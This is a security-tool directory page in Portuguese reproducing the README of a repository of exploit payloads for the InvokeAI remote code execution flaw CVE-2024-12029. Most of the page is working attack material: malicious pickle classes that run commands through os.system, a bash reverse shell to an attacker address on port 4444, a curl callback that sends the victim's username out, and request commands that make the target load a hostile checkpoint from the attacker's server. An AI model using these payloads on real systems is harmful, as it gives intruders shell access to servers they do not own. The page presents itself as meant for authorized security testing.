Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE — This repository contains alternative payload approaches for the InvokeAI RCE vulnerability (CVE-2024-12029) when SSH key injection fails. The payloads are designed to test if pickle deserialization is actually occurring and provide alternative access methods. | Kitploit
Ferramentas/GitHubGitHub/lu3ky13/alternative-approach-reverse-shell-callback-test-invokeai-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlLearning & EducationRemote Access ToolPayload Development

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
lu3ky13/alternative-approach-reverse-shell-callback-test-invokeai-rce

Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE

This repository contains alternative payload approaches for the InvokeAI RCE vulnerability (CVE-2024-12029) when SSH key injection fails. The payloads are designed to test if pickle deserialization is actually occurring and provide alternative access methods.

Ver Repositório
há 4 mesesAinda não revisado

Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE

Abordagem Alternativa: Reverse Shell & Teste de Callback

Visão Geral

Este repositório contém abordagens alternativas de payload para a vulnerabilidade InvokeAI RCE (CVE-2024-12029) quando a injeção de chave SSH falha. Os payloads são projetados para testar se a desserialização pickle está realmente ocorrendo e fornecer métodos de acesso alternativos.

Declaração do Problema

Quando payloads de injeção de chave SSH são entregues com sucesso (Status 201) mas o acesso SSH ainda requer senha, isso indica uma das seguintes opções:

  1. A desserialização pickle não está ocorrendo
  2. Os comandos estão sendo bloqueados/sandboxed
  3. O método de execução é incompatível

Solução: Payloads Alternativos

📁 Arquivos de Payload

Payloads de Reverse Shell

  • payload_reverse_bash.ckpt (89 bytes) - Reverse shell em Bash
  • payload_reverse_python.ckpt (267 bytes) - Reverse shell em Python
  • payload_reverse_nc.ckpt (70 bytes) - Reverse shell com Netcat

Payloads de Teste e Verificação

  • payload_callback_test.ckpt (115 bytes) - Callback HTTP para verificar desserialização
  • payload_test.ckpt (90 bytes) - Teste simples de criação de arquivo
  • payload_alt_exec.ckpt (223 bytes) - Método alternativo de execução

Payloads SSH (para referência)

  • payload_ssh_simple.ckpt (271 bytes) - Injeção de chave SSH compatível com Linux

🛠️ Scripts de Teste

Scripts de Teste no Kali

  • kali_reverse_test.py - Suíte de testes abrangente

Geradores de Payload

  • reverse_shell_payload.py - Gera payloads de reverse shell

🚀 Uso Rápido

1. Iniciar Servidor de Payload

root@kitploit:~
python web_server.py --port 8000

2. Testar Callback (Recomendado Primeiro)

root@kitploit:~
# Copy kali_reverse_test.py to Kali and run:
python3 kali_reverse_test.py
# Choose option 1 to test callback

3. Testar Reverse Shell

root@kitploit:~
# Start listener on Kali:
nc -lvnp 4444

# Send reverse shell payload:
python3 -c "import requests; requests.post('http://192.168.117.218:9090/api/v2/models/install', params={'source': 'http://192.168.45.168:8000/payload_reverse_bash.ckpt', 'inplace': 'true'}, json={})"

4. Testar Execução Simples

root@kitploit:~
# Test basic command execution:
python3 -c "import requests; requests.post('http://192.168.117.218:9090/api/v2/models/install', params={'source': 'http://192.168.45.168:8000/payload_test.ckpt', 'inplace': 'true'}, json={})"

# Verify file creation:
ssh [email protected] 'cat /tmp/payload_test.txt'

📊 Interpretação dos Resultados dos Testes

✅ Sucesso no Teste de Callback

  • O que significa: A desserialização pickle está funcionando
  • Próximo passo: Tente reverse shell ou payloads SSH alternativos
  • Verifique: Logs do servidor web para callback HTTP

✅ Sucesso no Reverse Shell

  • O que significa: Comandos são executados e o acesso à rede funciona
  • Resultado: Acesso direto ao shell via listener netcat
  • Próximo passo: Use o reverse shell para exploração adicional

✅ Arquivo de Teste Criado

  • O que significa: A execução básica de comandos funciona
  • Próximo passo: Tente métodos alternativos de injeção SSH
  • Verifique: /tmp/payload_test.txt no alvo

Payload de Callback

root@kitploit:~
class CallbackTestPayload:
    def __reduce__(self):
        import os
        command = 'curl "http://192.168.45.168:8000/callback?success=1&user=$(whoami)"'
        return (os.system, (command,))

Payload de Reverse Shell

root@kitploit:~
class ReverseShellPayload:
    def __reduce__(self):
        import os
        command = f'bash -c "bash -i >& /dev/tcp/192.168.45.168/4444 0>&1"'
        return (os.system, (command,))

Payload de Teste

root@kitploit:~
class TestPayload:
    def __reduce__(self):
        import os
        return (os.system, ('echo "PAYLOAD_EXECUTED_$(date)" > /tmp/payload_test.txt',))

📚 Referências

  • CVE-2024-12029: Execução Remota de Código no InvokeAI
  • Desserialização Insegura do PyTorch: Vulnerabilidade torch.load()
  • Pickle reduce: Exploração de serialização de objetos Python

⚠️ Aviso Legal

Este repositório é apenas para fins educacionais e de teste de segurança autorizado. Os usuários são responsáveis por garantir que possuem a devida autorização antes de testar qualquer sistema.

Baixar ferramenta